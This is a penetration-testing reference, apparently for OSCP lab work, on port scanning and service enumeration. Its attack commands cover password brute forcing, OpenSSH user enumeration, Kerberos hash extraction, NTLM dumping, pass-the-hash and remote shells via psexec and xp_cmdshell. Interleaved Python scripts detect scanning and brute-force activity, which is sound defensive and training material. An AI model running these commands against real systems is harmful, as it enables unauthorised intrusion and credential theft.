Port and Service Scanning

This page provides a comprehensive guide for port scanning and service enumeration, including practical commands and tips for various tools and protocols. Use these techniques to discover open ports, identify services, and perform further enumeration or attacks during penetration testing.

General Port Scanning Tools

AutoRecon

sudo ~/.local/bin/autorecon -o ~/oscp 10.11.1.1
sudo chown -R kali:kali . ; find . -type d -exec touch {}/.gitkeep \;

masscan

sudo masscan -p1-65535 10.11.1.1/32 --rate=1000 -e tun0 | tee masscan.txt

nmap

  • The de facto standard for port scanning and service enumeration.
nmap -Pn -sV -sC -p<port> 10.11.1.1 | tee nmap.txt

OneTwoPunch

echo "10.11.1.1" > target.txt
sudo bash ~/tool/onetwopunch/onetwopunch.sh -t target.txt -p tcp -i tun0 | tee otp-tcp.txt
sudo bash ~/tool/onetwopunch/onetwopunch.sh -t target.txt -p udp -i tun0 | tee otp-udp.txt

Use -i eth0 to specify a different interface.
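The masscan and nmap commands above are usually chained by hand: masscan finds the open ports fast, nmap's -sV -sC then does the slow service fingerprinting on just those ports. The following Python script (an added example, not code from this page or from either tool) parses the lines that `tee masscan.txt` captures, builds the comma-separated value nmap's -p flag expects, and diffs the result against an approved baseline so an asset owner can see which ports should not be reachable. The masscan output and the baseline are constructed samples.

```python
"""Turn masscan stdout into per-host nmap -p arguments and flag exposure
that an approved baseline does not list.  Added example for this page;
the masscan output and the baseline below are constructed samples."""
import re
from collections import defaultdict

# masscan prints one line per open port in this shape when run as on the page.
MASSCAN_LINE = re.compile(
    r"^Discovered open port (?P<port>\d+)/(?P<proto>tcp|udp) on (?P<host>\S+)"
)

# Constructed sample of what `... | tee masscan.txt` would have captured.
SAMPLE_MASSCAN = """\
Starting masscan (constructed banner line)
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 445/tcp on 10.11.1.1
Discovered open port 22/tcp on 10.11.1.1
Discovered open port 80/tcp on 10.11.1.1
Discovered open port 22/tcp on 10.11.1.1
Discovered open port 3389/tcp on 10.11.1.1
"""

# Constructed baseline: what the asset owner says should be reachable.
BASELINE = {"10.11.1.1": {(22, "tcp"), (80, "tcp")}}


def parse_masscan(text):
    """Return {host: {(port, proto), ...}}.  Banner and progress lines are
    skipped and duplicate discoveries (masscan retransmits) collapse."""
    found = defaultdict(set)
    for line in text.splitlines():
        m = MASSCAN_LINE.match(line.strip())
        if m:
            found[m["host"]].add((int(m["port"]), m["proto"]))
    return dict(found)


def nmap_port_arg(ports):
    """Build the value for nmap -p from a set of (port, proto) tuples,
    e.g. 'T:22,80,U:161'.  UDP ports are only scanned if -sU is also given."""
    tcp = sorted(p for p, proto in ports if proto == "tcp")
    udp = sorted(p for p, proto in ports if proto == "udp")
    parts = []
    if tcp:
        parts.append("T:" + ",".join(map(str, tcp)))
    if udp:
        parts.append("U:" + ",".join(map(str, udp)))
    return ",".join(parts)


def unexpected_exposure(observed, baseline):
    """Open ports per host that the baseline does not approve, sorted by port."""
    report = {}
    for host, ports in observed.items():
        extra = ports - baseline.get(host, set())
        if extra:
            report[host] = sorted(extra)
    return report


if __name__ == "__main__":
    hosts = parse_masscan(SAMPLE_MASSCAN)
    for host, ports in hosts.items():
        # Same nmap invocation as on the page, with -p filled from masscan.
        print(f"nmap -Pn -sV -sC -p{nmap_port_arg(ports)} {host}")
    print("not in baseline:", unexpected_exposure(hosts, BASELINE))
```

The baseline diff is the part worth keeping after the engagement: re-running the scan and comparing against the approved set turns a one-off scan into a check for attack-surface drift.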

Common Ports and Service Enumeration

For a list of common ports, see PacketLife Common Ports PDF.

Below are practical tips and commands for enumerating and attacking common services:

21/tcp - FTP

  • Anonymous login: anonymous / anonymous
  • File operations: ls, cd, get, put

Default Password Brute Force:

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 10.11.1.1 ftp

Nmap Scripts:

nmap --script 'ftp-*' -p 21 10.11.1.1

Password Brute Force:

hydra -t 1 -l username -P /usr/share/john/password.lst -vV 10.11.1.1 ftp
medusa -h 10.11.1.1 -u username -P /usr/share/john/password.lst -t 4 -M ftp

22/tcp - SSH

  • Connect: ssh username@10.11.1.1
  • Use -i ~/.ssh/id_ed25519 for key file, -p 2222 for custom port

User Enumeration (OpenSSH <= 7.7):

pyenv shell 2.7.18 ; pip install -U paramiko
python /usr/share/exploitdb/exploits/linux/remote/45939.py 10.11.1.1 username

Default Password Brute Force:

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt 10.11.1.1 ssh

Known Key Brute Force:

crowbar -b sshkey -s 10.11.1.1/32 -u username -k ~/tool/ssh-badkeys/authorized

Password Brute Force:

hydra -l username -P /usr/share/john/password.lst -t 4 10.11.1.1 ssh
medusa -h 10.11.1.1 -u username -P /usr/share/john/password.lst -M ssh
ncrack -p 22 --user username -P /usr/share/john/password.lst 10.11.1.1

Username & Password Brute Force:

hydra -e nsr -L /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -t 4 10.11.1.1 ssh
medusa -h 10.11.1.1 -U user.txt -P /usr/share/john/password.lst -M ssh
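Every hydra, medusa and ncrack invocation in the FTP and SSH sections leaves the same footprint on the target: a burst of authentication failures from one source, and, for the -L / -e nsr variants, failures spread over many usernames. The script below (an added example, not part of this page or of any of those tools) shows the detection side against constructed sshd auth.log lines: it parses "Failed password" records, counts failures per source inside a sliding time window, and separately flags sources that try several distinct usernames. The thresholds and the year used to complete the syslog timestamps are assumptions.

```python
"""Detect password guessing against sshd from auth.log lines.  Added example
for this page; the log lines, thresholds and the year (syslog timestamps
carry none) are constructed assumptions."""
import re
from collections import defaultdict
from datetime import datetime

# sshd logs both known and unknown ("invalid user") accounts with this shape.
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample: one guessing burst, one user who mistyped twice.
SAMPLE_AUTH_LOG = """\
Jan 12 10:00:01 bastion sshd[2201]: Accepted publickey for deploy from 10.0.0.7 port 50122 ssh2
Jan 12 10:00:05 bastion sshd[2210]: Failed password for root from 203.0.113.5 port 51234 ssh2
Jan 12 10:00:06 bastion sshd[2211]: Failed password for invalid user admin from 203.0.113.5 port 51235 ssh2
Jan 12 10:00:07 bastion sshd[2212]: Failed password for invalid user oracle from 203.0.113.5 port 51236 ssh2
Jan 12 10:00:08 bastion sshd[2213]: Failed password for invalid user test from 203.0.113.5 port 51237 ssh2
Jan 12 10:00:09 bastion sshd[2214]: Failed password for root from 203.0.113.5 port 51238 ssh2
Jan 12 10:00:10 bastion sshd[2215]: Failed password for root from 203.0.113.5 port 51239 ssh2
Jan 12 10:02:30 bastion sshd[2250]: Failed password for alice from 10.0.0.9 port 40001 ssh2
Jan 12 10:09:00 bastion sshd[2300]: Failed password for alice from 10.0.0.9 port 40002 ssh2
"""


def parse_failures(text, year=2024):
    """Return [(timestamp, source_ip, username)] for every failed password."""
    events = []
    for line in text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"]))
    return events


def detect_bruteforce(events, threshold=5, window_s=60, spray_users=3):
    """Return {source_ip: reason}.  A source is flagged when `threshold`
    failures fall inside any `window_s`-second window (single-account
    guessing, hydra -l/-P), or else when it fails against `spray_users`
    or more distinct names (username guessing, hydra -L / -e nsr)."""
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))

    alerts = {}
    for ip, items in by_ip.items():
        items.sort()
        times = [t for t, _ in items]
        users = {u for _, u in items}

        # Two-pointer sliding window over the sorted timestamps.
        burst = False
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break

        if burst:
            alerts[ip] = f"{len(items)} failures, {threshold}+ within {window_s}s"
        elif len(users) >= spray_users:
            alerts[ip] = f"{len(users)} distinct usernames tried"
    return alerts


if __name__ == "__main__":
    for ip, reason in detect_bruteforce(parse_failures(SAMPLE_AUTH_LOG)).items():
        print(f"ALERT {ip}: {reason}")
```

The two rules are deliberately separate: hydra -t 1 against a single account can stay under a per-minute threshold, but the username-spread rule still catches a -L run, and the burst rule catches a fast single-user run that never touches a second name. Tune the window to the sshd MaxAuthTries and LoginGraceTime in force on the host.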

80/tcp - HTTP

  • Use tools like nikto, gobuster, and check robots.txt for hidden paths.

Directory Brute Force:

gobuster dir -w /usr/share/dirb/wordlists/big.txt -s '200,204,301,302,307,403,500' -e -u http://10.11.1.1/
gobuster dir -w /usr/share/dirb/wordlists/big.txt -s '200,204,301,302,307,403,500' -e -u http://10.11.1.1/internal/

Use -k to ignore invalid certificate errors.

88/tcp - Kerberos

  • User enumeration and hash extraction using kerbrute and Impacket tools.

User Enumeration:

sudo nano /etc/hosts
10.11.1.1 domain.local domain.local
./kerbrute_linux_amd64 userenum -d domain.local --dc domain.local /usr/share/seclists/Usernames/Names/names.txt

Get Password Hashes:

python GetNPUsers.py domain.local/ -no-pass -usersfile user.txt
hashcat -a 0 -m 18200 hash.txt /usr/share/john/password.lst --force

Dump NTLM Hashes:

python3 secretsdump.py -dc-ip domain.local admin:password@domain.local

Pass The Hash (NTLM Hash & 5985/tcp):

evil-winrm -u Administrator -H 0e0*** -i domain.local
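Both Kerberos steps above are loud on the domain controller. kerbrute userenum produces a stream of 4768 (TGT requested) events with result code 0x6 (client principal unknown) from one client; GetNPUsers only succeeds against accounts with "Do not require Kerberos preauthentication" set, and the resulting 4768 shows pre-authentication type 0 with ticket encryption type 0x17 (RC4-HMAC), which is exactly what hashcat mode 18200 cracks. The following Python (an added example, not part of this page or of Impacket, kerbrute or hashcat) runs both detections over constructed event records shaped after the 4768 fields a SIEM would carry; the field names and the enumeration threshold are assumptions, not a real EVTX parser.

```python
"""Spot AS-REP roasting and Kerberos username enumeration in 4768 events.
Added example for this page; the records are constructed dicts named after
the 4768 fields (client address, account, result code, pre-auth type,
ticket encryption type), not parsed Windows event logs."""
from collections import Counter

SAMPLE_4768 = [
    # Normal logons: pre-auth type 2 (encrypted timestamp), AES256 (0x12).
    {"client": "10.11.1.50", "account": "jsmith", "status": "0x0", "preauth": "2", "etype": "0x12"},
    {"client": "10.11.1.50", "account": "jsmith", "status": "0x0", "preauth": "2", "etype": "0x12"},
    # One mistyped name from a workstation: a single 0x6 is normal noise.
    {"client": "10.11.1.50", "account": "jsmiht", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    # Wordlist enumeration from one client: names the KDC has never heard of.
    {"client": "10.11.1.200", "account": "aaron", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"client": "10.11.1.200", "account": "abigail", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"client": "10.11.1.200", "account": "adam", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"client": "10.11.1.200", "account": "adrian", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"client": "10.11.1.200", "account": "alan", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"client": "10.11.1.200", "account": "albert", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    # A valid name probed with no pre-auth data: KDC answers 0x19 (pre-auth required).
    {"client": "10.11.1.200", "account": "administrator", "status": "0x19", "preauth": "-", "etype": "0xffffffff"},
    # Account with pre-auth disabled: TGT issued with no pre-auth, RC4 etype.
    {"client": "10.11.1.200", "account": "svc_backup", "status": "0x0", "preauth": "0", "etype": "0x17"},
]


def detect_asrep_roast(events):
    """Accounts whose TGT was issued without pre-authentication and with
    RC4 (0x17): the crackable AS-REP material GetNPUsers collects."""
    return sorted({
        e["account"] for e in events
        if e["status"] == "0x0" and e["preauth"] == "0" and e["etype"] == "0x17"
    })


def detect_user_enum(events, min_unknown=5):
    """Clients that asked for TGTs for at least `min_unknown` distinct
    non-existent principals (result code 0x6)."""
    unknown = Counter()
    seen = set()
    for e in events:
        if e["status"] != "0x6":
            continue
        key = (e["client"], e["account"])
        if key not in seen:          # count each name once per client
            seen.add(key)
            unknown[e["client"]] += 1
    return {ip: n for ip, n in unknown.items() if n >= min_unknown}


if __name__ == "__main__":
    print("AS-REP roastable accounts:", detect_asrep_roast(SAMPLE_4768))
    print("enumerating clients:", detect_user_enum(SAMPLE_4768))
```

The roast rule doubles as an audit: any account it returns has pre-authentication disabled, and the fix is to clear that flag (and to stop issuing RC4 tickets) rather than to tune the alert. The enumeration threshold is a trade-off against help-desk typos, which is why the sample keeps one 0x6 from a normal workstation.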

139/445/tcp - SMB

  • File sharing, enumeration, and exploitation using smbclient, Impacket, and Metasploit.

List Shares:

smbclient -L //10.11.1.1/
smbclient -L //10.11.1.1/www
smbclient -L //10.11.1.1/www -U 'admin'

Password Brute Force:

python3 smbrute.py -h 10.11.1.1 -u root -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt

Reverse Shell:

python psexec.py "user:pass"@10.11.1.1
python psexec.py -hashes aad***:0e0*** "user"@10.11.1.1
python dcomexec.py "user:pass"@10.11.1.1
python dcomexec.py -hashes aad***:0e0*** "user"@10.11.1.1
python wmiexec.py "user:pass"@10.11.1.1
python wmiexec.py -hashes aad***:0e0*** "user"@10.11.1.1

Version Detection:

bash ~/tool/smbver/smbver.sh 10.11.1.115 139
msf6 > use auxiliary/scanner/smb/smb_version

1433/tcp - MSSQL

  • Microsoft SQL Server enumeration and exploitation.

Connect:

sqsh -S 10.11.1.1 -U sa
python mssqlclient.py -p 1433 sa:pass@10.11.1.1

Brute Force:

hydra -l sa -P /usr/share/wordlists/rockyou.txt 10.11.1.111 mssql
medusa -h 10.11.1.111 -u sa -P /usr/share/wordlists/rockyou.txt -M mssql
nmap -Pn -n -sS --script 'ms-sql-xp-cmdshell.nse' 10.11.1.1 -p 1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user",mssql.instance-all
nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt",passdb="/usr/share/seclists/Passwords/darkweb2017-top100.txt" 10.11.1.1

RCE:

3306/tcp - MySQL

  • MySQL Database

Connect:

mysql -h10.11.1.1 -P3306 -uroot -p

3389/tcp - RDP

  • Remote Desktop Protocol

Connect:

xfreerdp /f /u:user /p:pass /v:10.11.1.1

5900/tcp - VNC

  • VNC remote desktop

Password Brute Force:

hydra -s 5900 -P /usr/share/john/password.lst -t 16 10.11.1.1 vnc

5985/tcp - WinRM

  • Windows Remote Management

Connect:

evil-winrm -u user -p pass -i 10.11.1.1
evil-winrm -u Administrator -H 0e0*** -i domain.local